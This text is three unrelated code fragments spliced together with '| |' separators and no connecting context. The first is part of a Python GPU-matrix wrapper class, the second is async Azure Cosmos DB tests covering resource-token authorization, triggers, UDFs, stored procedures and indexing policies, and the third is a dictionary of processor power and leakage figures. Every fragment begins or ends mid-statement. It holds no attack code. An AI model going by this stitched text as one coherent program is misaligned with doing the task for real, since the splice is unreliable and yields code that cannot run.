if err_code:
raise generate_exception(err_code)
else:
# Initialize based on existing cudamat structure.
mat = array
self.mat = mat
self.p_mat = ct.pointer(self.mat)
self.size = self.mat.size
self.T = TransposedCUDAMatrix(self.mat)
# Keep a reference to free device memory in case of a crash.
self.__free_device_memory = _cudanet.free_device_memory
def __del__(self):
try:
if 'p_mat' in self.__dict__:
err_code = self.__free_device_memory(self.p_mat)
if err_code:
raise generate_exception(err_code)
except AttributeError:
pass
@staticmethod
def init_random(seed = None):
pass
# """
# Initialize and seed the random number generator.
# """
# NUM_RND_STREAMS = 96*128
# CUDAMatrix.rndInitialized = 1
# CUDAMatrix.rnd_state = rnd_struct()
# CUDAMatrix.rnd_state_p = ct.pointer(CUDAMatrix.rnd_state)
# cudamat_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'rnd_multipliers_32bit.txt')
# err_code = _cudanet.init_random(CUDAMatrix.rnd_state_p, ct.c_int(seed), cudamat_path)
# if err_code:
# raise generate_exception(err_code)
@property
def shape(self):
return (self.mat.size[0], self.mat.size[1])
def reshape(self, shape):
"""
Reshapes self to have the given shape. The number of elements cannot
change as this only changes how the contents are interpreted.
"""
m = ct.c_uint(shape[0])
n = ct.c_uint(shape[1])
# Reshape the default matrix
err_code = _cudanet.reshape(self.p_mat, m, n)
if err_code:
raise generate_exception(err_code)
# Reshape the transposed matrix
err_code = _cudanet.reshape(self.T.p_mat, m, n)
if err_code:
raise generate_exception(err_code)
# Reshape the CPU matrix
if self.mat.on_host:
self.numpy_array = np.reshape(self.numpy_array, shape, order='C')
return self
def asarray(self):
"""
Copies the matrix to an ndarray on the CPU and returns it.
"""
self.copy_to_host()
return self.numpy_array
def get_gpu_pointer(self):
"""
Return the gpu pointer
"""
return _cudanet.get_gpu_pointer(self.p_mat)
def get_data_device_id(self):
"""
Return the device id on which the matrix data resides
"""
dev_id = _cudanet.get_data_device_id(self.p_mat)
# Error codes only for negative device ids
if (dev_id < 0):
raise generate_exception(dev_id)
else:
return dev_id
def copy_to_device(self):
"""
Copy the matrix to the GPU.
"""
err_code = _cudanet.copy_to_device(self.p_mat)
if err_code:
raise generate_exception(err_code)
def copy_to_host(self):
"""
Copy the matrix to the CPU.
"""
if not self.mat.on_host:
# allocate host storage if necessary
m = self.mat.size[0]
n = self.mat.size[1]
self.numpy_array = np.empty((m, n), dtype=np.float32, order = 'C')
_cudanet.set_host_mat(self.p_mat, self.numpy_array.ctypes.data_as(ct.POINTER(ct.c_float)))
self.mat.on_host = 1
err_code = _cudanet.copy_to_host(self.p_mat)
if err_code:
raise generate_exception(err_code)
def get_gpu_pythonbuf(self):
print "about to return the pybuf"
return _cudanet.get_gpu_pythonbuf(self.p_mat)
def _memoryView(self):
SHAPE = ctypes.c_ssize_t * 1
STRIDES = ctypes.c_ssize_t * 1
pybuffer = _PY_BUFFER()
pybuffer.buf = self.get_gpu_pointer()
pybuffer.obj = ctypes.py_object()
pybuffer.len = self.mat.size[0] * self.mat.size[1]
pybuffer.itemsize = 4
pybuffer.readonly = 0
pybuffer.ndim = 1
pybuffer.format = 'f'
pybuffer.shape = SHAPE(self.mat.size[0] * self.mat.size[1])
pybuffer.strides = STRIDES(1)
pybuffer.suboffsets = ctypes.POINTER(ctypes.c_ssize_t)()
pybuffer.smalltable[0] = 0
pybuffer.smalltable[1] = 0
pybuffer.internal = ctypes.c_void_p()
pythonapi.PyMemoryView_FromBuffer.argtypes = [ctypes.POINTER(_PY_BUFFER)]
pythonapi.PyMemoryView_FromBuffer.restype = ctypes.py_object
return pythonapi.PyMemoryView_FromBuffer(ctypes.byref(pybuffer))
def copy(self, include_host = False):
"""
Create a copy of the matrix on the GPU. If include_host is True, also
creates a copy of the matrix on the CPU if one exists.
"""
new_mat = empty(self.shape).assign(self)
if include_host and self.mat.on_host:
new_mat.numpy_array = self.numpy_array.copy()
_cudanet.set_host_mat(new_mat.p_mat, new_mat.numpy_array.ctypes.data_as(ct.POINTER(ct.c_float)))
new_mat.mat.on_host = 1
return new_mat
def copy_from(self, src, is_trans=False):
"""
Copy the source matrix from the host.
"""
_cudanet.copy_from(self.p_mat, src.ctypes.data_as(ct.POINTER(ct.c_float)), ct.c_bool(is_trans))
def assign(self, val):
"""Assign val to self, where val can be a scalar or a CUDAMatrix
with the same dimensions as self. """
if isinstance(val, CUDAMatrix):
err_code = _cudanet.copy_on_device(val.p_mat, self.p_mat)
elif isinstance(val, (np.int32, np.float32, int, float)):
err_code = _cudanet.assign_scalar(self.p_mat, ct.c_float(val))
else:
raise ValueError("Assigned value must be of type CUDAMatrix, int, or float.")
if err_code:
raise generate_exception(err_code)
return self
def set_host_mat(self, newbuf):
"""
For | |
read permissions and verify count remains the same
permissions = [permission async for permission in user.list_permissions()]
self.assertEqual(len(permissions), before_create_count)
async def test_authorization(self):
async def __SetupEntities(client):
"""
Sets up entities for this test.
:Parameters:
- `client`: cosmos_client_connection.CosmosClientConnection
:Returns:
dict
"""
# create database
db = self.databaseForTest
# create collection
collection = await db.create_container(
id='test_authorization' + str(uuid.uuid4()),
partition_key=PartitionKey(path='/id', kind='Hash')
)
# create document1
document = await collection.create_item(
body={'id': 'doc1',
'spam': 'eggs',
'key': 'value'},
)
# create user
user = await db.create_user(body={'id': 'user' + str(uuid.uuid4())})
# create permission for collection
permission = {
'id': 'permission On Coll',
'permissionMode': documents.PermissionMode.Read,
'resource': "dbs/" + db.id + "/colls/" + collection.id
}
permission_on_coll = await user.create_permission(body=permission)
self.assertIsNotNone(permission_on_coll.properties['_token'],
'permission token is invalid')
# create permission for document
permission = {
'id': 'permission On Doc',
'permissionMode': documents.PermissionMode.All,
'resource': "dbs/" + db.id + "/colls/" + collection.id + "/docs/" + document["id"]
}
permission_on_doc = await user.create_permission(body=permission)
self.assertIsNotNone(permission_on_doc.properties['_token'],
'permission token is invalid')
entities = {
'db': db,
'coll': collection,
'doc': document,
'user': user,
'permissionOnColl': permission_on_coll,
'permissionOnDoc': permission_on_doc,
}
return entities
# Client without any authorization will fail.
async with CosmosClient(CRUDTests.host, {}, consistency_level="Session", connection_policy=CRUDTests.connectionPolicy) as client:
try:
db_list = [db async for db in client.list_databases()]
except exceptions.CosmosHttpResponseError as e:
assert e.status_code == 401
# Client with master key.
async with CosmosClient(CRUDTests.host,
CRUDTests.masterKey,
consistency_level="Session",
connection_policy=CRUDTests.connectionPolicy) as client:
# setup entities
entities = await __SetupEntities(client)
resource_tokens = {"dbs/" + entities['db'].id + "/colls/" + entities['coll'].id:
entities['permissionOnColl'].properties['_token']}
async with CosmosClient(
CRUDTests.host, resource_tokens, consistency_level="Session", connection_policy=CRUDTests.connectionPolicy) as col_client:
db = entities['db']
old_client_connection = db.client_connection
db.client_connection = col_client.client_connection
# 1. Success-- Use Col Permission to Read
success_coll = db.get_container_client(container=entities['coll'])
# 2. Failure-- Use Col Permission to delete
await self.__AssertHTTPFailureWithStatus(StatusCodes.FORBIDDEN,
db.delete_container,
success_coll)
# 3. Success-- Use Col Permission to Read All Docs
success_documents = [document async for document in success_coll.read_all_items()]
self.assertTrue(success_documents != None,
'error reading documents')
self.assertEqual(len(success_documents),
1,
'Expected 1 Document to be successfully read')
# 4. Success-- Use Col Permission to Read Doc
docId = entities['doc']['id']
success_doc = await success_coll.read_item(
item=docId,
partition_key=docId
)
self.assertTrue(success_doc != None, 'error reading document')
self.assertEqual(
success_doc['id'],
entities['doc']['id'],
'Expected to read children using parent permissions')
# 5. Failure-- Use Col Permission to Delete Doc
await self.__AssertHTTPFailureWithStatus(StatusCodes.FORBIDDEN,
success_coll.delete_item,
docId, docId)
resource_tokens = {"dbs/" + entities['db'].id + "/colls/" + entities['coll'].id + "/docs/" + docId:
entities['permissionOnDoc'].properties['_token']}
async with CosmosClient(
CRUDTests.host, resource_tokens, consistency_level="Session", connection_policy=CRUDTests.connectionPolicy) as doc_client:
# 6. Success-- Use Doc permission to read doc
read_doc = await doc_client.get_database_client(db.id).get_container_client(success_coll.id).read_item(docId, docId)
self.assertEqual(read_doc["id"], docId)
# 7. Success-- Use Doc permission to delete doc
await doc_client.get_database_client(db.id).get_container_client(success_coll.id).delete_item(docId, docId)
self.assertEqual(read_doc["id"], docId)
db.client_connection = old_client_connection
await db.delete_container(entities['coll'])
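# Editor's note (illustrative summary, not part of the original test): the
# resource-token flow exercised above boils down to
#   token = permission.properties['_token']
#   scoped = CosmosClient(host, {"dbs/<db>/colls/<coll>": token})
# where the scoped client can read the collection but gets FORBIDDEN on
# delete, matching the Read permission mode it was granted.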
async def test_trigger_crud(self):
# create database
db = self.databaseForTest
# create collection
collection = await self.databaseForTest.create_container(test_config._test_config.TEST_COLLECTION_MULTI_PARTITION)
# read triggers
triggers = [trigger async for trigger in collection.scripts.list_triggers()]
# create a trigger
before_create_triggers_count = len(triggers)
trigger_definition = {
'id': 'sample trigger',
'serverScript': 'function() {var x = 10;}',
'triggerType': documents.TriggerType.Pre,
'triggerOperation': documents.TriggerOperation.All
}
trigger = await collection.scripts.create_trigger(body=trigger_definition)
for property in trigger_definition:
if property != "serverScript":
self.assertEqual(
trigger[property],
trigger_definition[property],
'property {property} should match'.format(property=property))
else:
self.assertEqual(trigger['body'],
'function() {var x = 10;}')
# read triggers after creation
triggers = [trigger async for trigger in collection.scripts.list_triggers()]
self.assertEqual(len(triggers),
before_create_triggers_count + 1,
'create should increase the number of triggers')
# query triggers
triggers = [trigger async for trigger in collection.scripts.query_triggers(
query='SELECT * FROM root r WHERE r.id=@id',
parameters=[
{'name': '@id', 'value': trigger_definition['id']}
]
)]
self.assertTrue(triggers)
# replace trigger
change_trigger = trigger.copy()
trigger['body'] = 'function() {var x = 20;}'
replaced_trigger = await collection.scripts.replace_trigger(change_trigger['id'], trigger)
for property in trigger_definition:
if property != "serverScript":
self.assertEqual(
replaced_trigger[property],
trigger[property],
'property {property} should match'.format(property=property))
else:
self.assertEqual(replaced_trigger['body'],
'function() {var x = 20;}')
# read trigger
trigger = await collection.scripts.get_trigger(replaced_trigger['id'])
self.assertEqual(replaced_trigger['id'], trigger['id'])
# delete trigger
await collection.scripts.delete_trigger(replaced_trigger['id'])
# read triggers after deletion
await self.__AssertHTTPFailureWithStatus(StatusCodes.NOT_FOUND,
collection.scripts.delete_trigger,
replaced_trigger['id'])
async def test_udf_crud(self):
# create database
db = self.databaseForTest
# create collection
collection = await self.databaseForTest.create_container(test_config._test_config.TEST_COLLECTION_MULTI_PARTITION)
# read udfs
udfs = [udf async for udf in collection.scripts.list_user_defined_functions()]
# create a udf
before_create_udfs_count = len(udfs)
udf_definition = {
'id': 'sample udf',
'body': 'function() {var x = 10;}'
}
udf = await collection.scripts.create_user_defined_function(body=udf_definition)
for property in udf_definition:
self.assertEqual(
udf[property],
udf_definition[property],
'property {property} should match'.format(property=property))
# read udfs after creation
udfs = [udf async for udf in collection.scripts.list_user_defined_functions()]
self.assertEqual(len(udfs),
before_create_udfs_count + 1,
'create should increase the number of udfs')
# query udfs
results = [udf async for udf in collection.scripts.query_user_defined_functions(
query='SELECT * FROM root r WHERE r.id=@id',
parameters=[
{'name': '@id', 'value': udf_definition['id']}
]
)]
self.assertTrue(results)
# replace udf
change_udf = udf.copy()
udf['body'] = 'function() {var x = 20;}'
replaced_udf = await collection.scripts.replace_user_defined_function(udf=udf['id'], body=udf)
for property in udf_definition:
self.assertEqual(
replaced_udf[property],
udf[property],
'property {property} should match'.format(property=property))
# read udf
udf = await collection.scripts.get_user_defined_function(replaced_udf['id'])
self.assertEqual(replaced_udf['id'], udf['id'])
# delete udf
await collection.scripts.delete_user_defined_function(replaced_udf['id'])
# read udfs after deletion
await self.__AssertHTTPFailureWithStatus(StatusCodes.NOT_FOUND,
collection.scripts.get_user_defined_function,
replaced_udf['id'])
async def test_sproc_crud(self):
# create database
db = self.databaseForTest
# create collection
collection = await self.databaseForTest.create_container(test_config._test_config.TEST_COLLECTION_MULTI_PARTITION)
# read sprocs
sprocs = [sproc async for sproc in collection.scripts.list_stored_procedures()]
# create a sproc
before_create_sprocs_count = len(sprocs)
sproc_definition = {
'id': 'sample sproc',
'serverScript': 'function() {var x = 10;}'
}
sproc = await collection.scripts.create_stored_procedure(body=sproc_definition)
for property in sproc_definition:
if property != "serverScript":
self.assertEqual(
sproc[property],
sproc_definition[property],
'property {property} should match'.format(property=property))
else:
self.assertEqual(sproc['body'], 'function() {var x = 10;}')
# read sprocs after creation
sprocs = [sproc async for sproc in collection.scripts.list_stored_procedures()]
self.assertEqual(len(sprocs),
before_create_sprocs_count + 1,
'create should increase the number of sprocs')
# query sprocs
sprocs = [sproc async for sproc in collection.scripts.query_stored_procedures(
query='SELECT * FROM root r WHERE r.id=@id',
parameters=[
{'name': '@id', 'value': sproc_definition['id']}
]
)]
self.assertIsNotNone(sprocs)
# replace sproc
change_sproc = sproc.copy()
sproc['body'] = 'function() {var x = 20;}'
replaced_sproc = await collection.scripts.replace_stored_procedure(sproc=change_sproc['id'], body=sproc)
for property in sproc_definition:
if property != 'serverScript':
self.assertEqual(
replaced_sproc[property],
sproc[property],
'property {property} should match'.format(property=property))
else:
self.assertEqual(replaced_sproc['body'],
"function() {var x = 20;}")
# read sproc
sproc = await collection.scripts.get_stored_procedure(replaced_sproc['id'])
self.assertEqual(replaced_sproc['id'], sproc['id'])
# delete sproc
await collection.scripts.delete_stored_procedure(replaced_sproc['id'])
# read sprocs after deletion
await self.__AssertHTTPFailureWithStatus(StatusCodes.NOT_FOUND,
collection.scripts.get_stored_procedure,
replaced_sproc['id'])
async def test_script_logging_execute_stored_procedure(self):
created_db = self.databaseForTest
created_collection = await self.databaseForTest.create_container(test_config._test_config.TEST_COLLECTION_MULTI_PARTITION)
sproc = {
'id': 'storedProcedure' + str(uuid.uuid4()),
'body': (
'function () {' +
' var mytext = \'x\';' +
' var myval = 1;' +
' try {' +
' console.log(\'The value of %s is %s.\', mytext, myval);' +
' getContext().getResponse().setBody(\'Success!\');' +
' }' +
' catch (err) {' +
' getContext().getResponse().setBody(\'inline err: [\' + err.number + \'] \' + err);' +
' }'
'}')
}
created_sproc = await created_collection.scripts.create_stored_procedure(body=sproc)
result = await created_collection.scripts.execute_stored_procedure(
sproc=created_sproc['id'],
partition_key=1
)
self.assertEqual(result, 'Success!')
self.assertFalse(
HttpHeaders.ScriptLogResults in created_collection.scripts.client_connection.last_response_headers)
result = await created_collection.scripts.execute_stored_procedure(
sproc=created_sproc['id'],
enable_script_logging=True,
partition_key=1
)
self.assertEqual(result, 'Success!')
self.assertEqual(urllib.quote('The value of x is 1.'),
created_collection.scripts.client_connection.last_response_headers.get(
HttpHeaders.ScriptLogResults))
result = await created_collection.scripts.execute_stored_procedure(
sproc=created_sproc['id'],
enable_script_logging=False,
partition_key=1
)
self.assertEqual(result, 'Success!')
self.assertFalse(
HttpHeaders.ScriptLogResults in created_collection.scripts.client_connection.last_response_headers)
async def test_collection_indexing_policy(self):
# create database
db = self.databaseForTest
# create collection
collection = await db.create_container(
id='test_collection_indexing_policy default policy' + str(uuid.uuid4()),
partition_key=PartitionKey(path='/id', kind='Hash')
)
collection_properties = await collection.read()
self.assertEqual(collection_properties['indexingPolicy']['indexingMode'],
documents.IndexingMode.Consistent,
'default indexing mode should be consistent')
await db.delete_container(container=collection)
consistent_collection = await db.create_container(
id='test_collection_indexing_policy consistent collection ' + str(uuid.uuid4()),
indexing_policy={
'indexingMode': documents.IndexingMode.Consistent
},
partition_key=PartitionKey(path='/id', kind='Hash')
)
consistent_collection_properties = await consistent_collection.read()
self.assertEqual(consistent_collection_properties['indexingPolicy']['indexingMode'],
documents.IndexingMode.Consistent,
'indexing mode should be consistent')
await db.delete_container(container=consistent_collection)
collection_with_indexing_policy = await db.create_container(
id='CollectionWithIndexingPolicy ' + str(uuid.uuid4()),
indexing_policy={
'automatic': True,
'indexingMode': documents.IndexingMode.Consistent,
'includedPaths': [
{
'path': '/',
'indexes': [
{
'kind': documents.IndexKind.Hash,
'dataType': documents.DataType.Number,
'precision': 2
}
]
}
],
'excludedPaths': [
{
'path': '/"systemMetadata"/*'
}
]
},
partition_key=PartitionKey(path='/id', kind='Hash')
)
collection_with_indexing_policy_properties = await collection_with_indexing_policy.read()
self.assertEqual(1,
len(collection_with_indexing_policy_properties['indexingPolicy']['includedPaths']),
'Unexpected includedPaths length')
self.assertEqual(2,
len(collection_with_indexing_policy_properties['indexingPolicy']['excludedPaths']),
'Unexpected excluded path count')
await db.delete_container(container=collection_with_indexing_policy)
async def test_create_default_indexing_policy(self):
# create database
db = self.databaseForTest
# no indexing policy specified
collection = await db.create_container(
id='test_create_default_indexing_policy TestCreateDefaultPolicy01' + str(uuid.uuid4()),
partition_key=PartitionKey(path='/id', kind='Hash')
)
collection_properties = await collection.read()
await self._check_default_indexing_policy_paths(collection_properties['indexingPolicy'])
await db.delete_container(container=collection)
# partial policy specified
collection = await db.create_container(
id='test_create_default_indexing_policy TestCreateDefaultPolicy01' + str(uuid.uuid4()),
indexing_policy={
'indexingMode': documents.IndexingMode.Consistent, 'automatic': True
},
partition_key=PartitionKey(path='/id', kind='Hash')
)
collection_properties = await collection.read()
await self._check_default_indexing_policy_paths(collection_properties['indexingPolicy'])
await db.delete_container(container=collection)
# default policy
collection = await db.create_container(
id='test_create_default_indexing_policy TestCreateDefaultPolicy03' + str(uuid.uuid4()),
indexing_policy={},
partition_key=PartitionKey(path='/id', kind='Hash')
)
collection_properties | |
0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.248406,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.52292,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0237353,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.221331,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.128895,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.111703,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.180173,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.090945,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.38282,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.107994,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.26079,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0243511,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00468532,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0427376,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0346508,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0670886,
'Execution Unit/Register Files/Runtime Dynamic': 0.0393361,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0959712,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.241133,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.29,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00095396,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00095396,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000857234,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000346254,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000497762,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00326292,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00820552,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0333107,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.11885,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.100471,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.113138,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.4402,
'Instruction Fetch Unit/Runtime Dynamic': 0.258388,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0416661,
'L2/Runtime Dynamic': 0.0071598,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.36623,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.551646,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0365295,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0365295,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.53873,
'Load Store Unit/Runtime Dynamic': 0.768326,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0900756,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.180151,
